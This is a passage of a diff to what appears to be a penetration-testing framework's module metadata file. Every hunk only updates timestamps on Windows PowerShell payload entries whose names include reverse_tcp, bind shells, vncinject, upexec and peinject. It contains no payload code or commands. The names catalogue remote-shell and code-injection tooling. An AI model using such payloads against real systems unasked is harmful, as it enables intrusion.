"ref_name": "cmd/windows/powershell/peinject/reverse_named_pipe",
|
||||
@@ -174938,7 +175162,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/peinject/reverse_nonx_tcp",
|
||||
@@ -174974,7 +175198,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/peinject/reverse_ord_tcp",
|
||||
@@ -175012,7 +175236,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/peinject/reverse_tcp",
|
||||
@@ -175050,7 +175274,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/peinject/reverse_tcp_allports",
|
||||
@@ -175089,7 +175313,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/peinject/reverse_tcp_dns",
|
||||
@@ -175129,7 +175353,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/peinject/reverse_tcp_rc4",
|
||||
@@ -175169,7 +175393,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/peinject/reverse_tcp_rc4_dns",
|
||||
@@ -175206,7 +175430,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/peinject/reverse_tcp_uuid",
|
||||
@@ -175241,7 +175465,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/pingback_bind_tcp",
|
||||
@@ -175276,7 +175500,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/pingback_reverse_tcp",
|
||||
@@ -175314,7 +175538,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/powershell_bind_tcp",
|
||||
@@ -175352,7 +175576,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/powershell_reverse_tcp",
|
||||
@@ -175390,7 +175614,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/powershell_reverse_tcp_ssl",
|
||||
@@ -175429,7 +175653,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/shell/bind_hidden_ipknock_tcp",
|
||||
@@ -175468,7 +175692,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/shell/bind_hidden_tcp",
|
||||
@@ -175506,7 +175730,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/shell/bind_ipv6_tcp",
|
||||
@@ -175545,7 +175769,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/shell/bind_ipv6_tcp_uuid",
|
||||
@@ -175582,7 +175806,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/shell/bind_named_pipe",
|
||||
@@ -175619,7 +175843,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/shell/bind_nonx_tcp",
|
||||
@@ -175657,7 +175881,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/shell/bind_tcp",
|
||||
@@ -175697,7 +175921,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/shell/bind_tcp_rc4",
|
||||
@@ -175735,7 +175959,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/shell/bind_tcp_uuid",
|
||||
@@ -175772,7 +175996,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/shell/find_tag",
|
||||
@@ -175810,7 +176034,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/shell/reverse_ipv6_tcp",
|
||||
@@ -175847,7 +176071,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/shell/reverse_nonx_tcp",
|
||||
@@ -175883,7 +176107,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/shell/reverse_ord_tcp",
|
||||
@@ -175921,7 +176145,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/shell/reverse_tcp",
|
||||
@@ -175959,7 +176183,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/shell/reverse_tcp_allports",
|
||||
@@ -175998,7 +176222,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/shell/reverse_tcp_dns",
|
||||
@@ -176038,7 +176262,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/shell/reverse_tcp_rc4",
|
||||
@@ -176078,7 +176302,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/shell/reverse_tcp_rc4_dns",
|
||||
@@ -176116,7 +176340,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/shell/reverse_tcp_uuid",
|
||||
@@ -176153,7 +176377,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/shell/reverse_udp",
|
||||
@@ -176189,7 +176413,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/shell_bind_tcp",
|
||||
@@ -176224,7 +176448,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/shell_bind_tcp_xpfw",
|
||||
@@ -176261,7 +176485,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/shell_hidden_bind_tcp",
|
||||
@@ -176297,7 +176521,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/shell_reverse_tcp",
|
||||
@@ -176332,7 +176556,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/speak_pwned",
|
||||
@@ -176371,7 +176595,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/upexec/bind_hidden_ipknock_tcp",
|
||||
@@ -176410,7 +176634,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/upexec/bind_hidden_tcp",
|
||||
@@ -176448,7 +176672,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/upexec/bind_ipv6_tcp",
|
||||
@@ -176487,7 +176711,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/upexec/bind_ipv6_tcp_uuid",
|
||||
@@ -176524,7 +176748,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/upexec/bind_named_pipe",
|
||||
@@ -176560,7 +176784,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/upexec/bind_nonx_tcp",
|
||||
@@ -176598,7 +176822,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/upexec/bind_tcp",
|
||||
@@ -176638,7 +176862,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/upexec/bind_tcp_rc4",
|
||||
@@ -176676,7 +176900,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/upexec/bind_tcp_uuid",
|
||||
@@ -176713,7 +176937,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/upexec/find_tag",
|
||||
@@ -176751,7 +176975,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/upexec/reverse_ipv6_tcp",
|
||||
@@ -176787,7 +177011,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/upexec/reverse_nonx_tcp",
|
||||
@@ -176824,7 +177048,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/upexec/reverse_ord_tcp",
|
||||
@@ -176862,7 +177086,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/upexec/reverse_tcp",
|
||||
@@ -176900,7 +177124,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/upexec/reverse_tcp_allports",
|
||||
@@ -176939,7 +177163,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/upexec/reverse_tcp_dns",
|
||||
@@ -176979,7 +177203,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/upexec/reverse_tcp_rc4",
|
||||
@@ -177019,7 +177243,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/upexec/reverse_tcp_rc4_dns",
|
||||
@@ -177057,7 +177281,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/upexec/reverse_tcp_uuid",
|
||||
@@ -177094,7 +177318,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/upexec/reverse_udp",
|
||||
@@ -177133,7 +177357,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/vncinject/bind_hidden_ipknock_tcp",
|
||||
@@ -177172,7 +177396,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/vncinject/bind_hidden_tcp",
|
||||
@@ -177210,7 +177434,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/vncinject/bind_ipv6_tcp",
|
||||
@@ -177249,7 +177473,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/vncinject/bind_ipv6_tcp_uuid",
|
||||
@@ -177286,7 +177510,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/vncinject/bind_named_pipe",
|
||||
@@ -177323,7 +177547,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/vncinject/bind_nonx_tcp",
|
||||
@@ -177361,7 +177585,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/vncinject/bind_tcp",
|
||||
@@ -177401,7 +177625,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/vncinject/bind_tcp_rc4",
|
||||
@@ -177439,7 +177663,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/vncinject/bind_tcp_uuid",
|
||||
@@ -177476,7 +177700,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/vncinject/find_tag",
|
||||
@@ -177515,7 +177739,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
